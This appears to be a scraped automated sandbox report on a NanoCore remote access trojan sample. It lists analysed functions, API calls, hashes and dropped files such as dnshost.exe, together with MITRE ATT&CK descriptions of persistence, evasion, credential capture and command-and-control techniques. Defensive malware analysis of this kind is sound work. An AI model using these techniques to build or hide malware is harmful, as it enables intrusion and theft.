GetCurrentThread.KERNEL32 ref: 02ECD4D3
GetCurrentProcess.KERNEL32 ref: 02ECD510
GetCurrentThreadId.KERNEL32 ref: 02ECD569

Strings

N|#, xrefs: 02ECD434

Memory Dump Source

Source File: 00000014.00000002.2212524157.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ec0000_dnshost.jbxd

Similarity

API ID: Current$ProcessThread
String ID: N|#
API String ID: 2063062207-3667892064
Opcode ID: 1c083ba265ab016121cc1aa1562289041d9dbc9d8b0e0515dac9ec89bdf53513
Instruction ID: 7051b8250afe2a8438c361bd3e4ab4dda7d3098fd241002df6e8711a45fbb874
Opcode Fuzzy Hash: 1c083ba265ab016121cc1aa1562289041d9dbc9d8b0e0515dac9ec89bdf53513
Instruction Fuzzy Hash: 8C5153B1900209CFDB18DFAADA48B9EBBF1EF48314F24C46DE109A7350D735A985CB65

Function 02ECAD88 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02ECAFDE

Strings

N|#, xrefs: 02ECAF97

Memory Dump Source

Source File: 00000014.00000002.2212524157.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ec0000_dnshost.jbxd

Similarity

API ID: HandleModule
String ID: N|#
API String ID: 4139908857-3667892064
Opcode ID: 82fe8feec87782ff01ad69fe5ba118e3eea8bb820a4558b1535d6a7fa89e3663
Instruction ID: 12682a829cf66453d90dfa16a43c8f146ca8a45dd066b41d320d5adc7784cbdf
Opcode Fuzzy Hash: 82fe8feec87782ff01ad69fe5ba118e3eea8bb820a4558b1535d6a7fa89e3663
Instruction Fuzzy Hash: CD7113B0A00B098FDB24DF69D54575ABBF2FF48308F108A2DE48697B40DB34E946CB90

Function 02ECD660 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02ECD6E7

Strings

N|#, xrefs: 02ECD67F

Memory Dump Source

Source File: 00000014.00000002.2212524157.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ec0000_dnshost.jbxd

Similarity

API ID: DuplicateHandle
String ID: N|#
API String ID: 3793708945-3667892064
Opcode ID: 193f242763787e2a4ad8b8b4ac9f9a918ec3f56cc371e7fd63d7f027279ab53b
Instruction ID: 4a1f8c1ea27654f8afda0a1f68905e989668860f6291fe79b13e04440cf0fb97
Opcode Fuzzy Hash: 193f242763787e2a4ad8b8b4ac9f9a918ec3f56cc371e7fd63d7f027279ab53b
Instruction Fuzzy Hash: 7321E4B59002499FDB10CF9AD984ADEBBF8EB48310F14841AE918A3350C375A940CFA4

Function 02ECAF78 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02ECAFDE

Strings

N|#, xrefs: 02ECAF97

Memory Dump Source

Source File: 00000014.00000002.2212524157.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2ec0000_dnshost.jbxd

Similarity

API ID: HandleModule
String ID: N|#
API String ID: 4139908857-3667892064
Opcode ID: 2ff1f2a5c4100703f3ff4d2965bec2e813759d797b238266f30544ba0f8b4027
Instruction ID: 8c475b1aa6136fe82c25410c6d4cbee2535dcbc45e863f20bf06583c51c4e0b6
Opcode Fuzzy Hash: 2ff1f2a5c4100703f3ff4d2965bec2e813759d797b238266f30544ba0f8b4027
Instruction Fuzzy Hash: 551113B6C002498FCB20CF9AD944ADEFBF4EB88318F10846ED419A7300C375A545CFA1

Function 0167D4A0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2212099675.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_167d000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a04a246d988c230acc8edb5d5050b18b7f666794a486cb63683ad9361d92f67b
Instruction ID: 6c1f98c635316fd957edd033a72cd639b1610c921f5c8fce8127349dbfbee689
Opcode Fuzzy Hash: a04a246d988c230acc8edb5d5050b18b7f666794a486cb63683ad9361d92f67b
Instruction Fuzzy Hash: C52106B1504200DFEB16DF98DDC0B26BF65FF88328F24C969D90A0A25AC336D456CAA1

Function 0168D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2212232600.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_168d000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7cca4dda6fea6f3ccf9c229b48ed1104f81668d323f3d054c1ea4e9f199eae0
Instruction ID: 857da05762b43a6e9a5d797e9301f27c9147dc473040bc40f95a609c9c661484
Opcode Fuzzy Hash: d7cca4dda6fea6f3ccf9c229b48ed1104f81668d323f3d054c1ea4e9f199eae0
Instruction Fuzzy Hash: B5212271604200DFDB15EF98DD80B26BB65EB88324F20CA6DD90A4B386C33AD807CA71

Function 0168D006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2212232600.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_168d000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4d749fc16ee306901d44c10658aeea16a6df8a02b6e623371a3135b6320ef00
Instruction ID: 97a296d2c03b06c8f0212444ca727814c18a7d3ad9a5f5086affc3e2476ac6eb
Opcode Fuzzy Hash: d4d749fc16ee306901d44c10658aeea16a6df8a02b6e623371a3135b6320ef00
Instruction Fuzzy Hash: 2521A1755093808FDB03DF64D994B15BF71EB46314F28C6DAD8498B2A7C33A980BCB62

Function 0167D49B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2212099675.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_167d000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction ID: 8933753ed6212dd9b182e6b99685bf7135c7bc0373aba1668e65fd79be184811
Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction Fuzzy Hash: 4A11AF76504240DFDB16CF58D9C4B16BF62FF84324F24C6A9D9094B256C33AD45ACBA2

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report nD2ozRD7MN.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: NanoCore

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

AV Detection

E-Banking Fraud

System Summary

Persistence and Installation Behavior

Stealing of Sensitive Information

Remote Access Functionality

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\DNS Host\dnshost.exe

C:\Program Files (x86)\DNS Host\dnshost.exe:Zone.Identifier

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nD2ozRD7MN.exe_4fa1da79cea2cbf32999c8e1107f97476821d1_8feead53_d883b67e-1feb-4267-a892-15cd5ec5b08e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3715.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC750.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC79F.tmp.xml

Windows Analysis Report
nD2ozRD7MN.exe

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre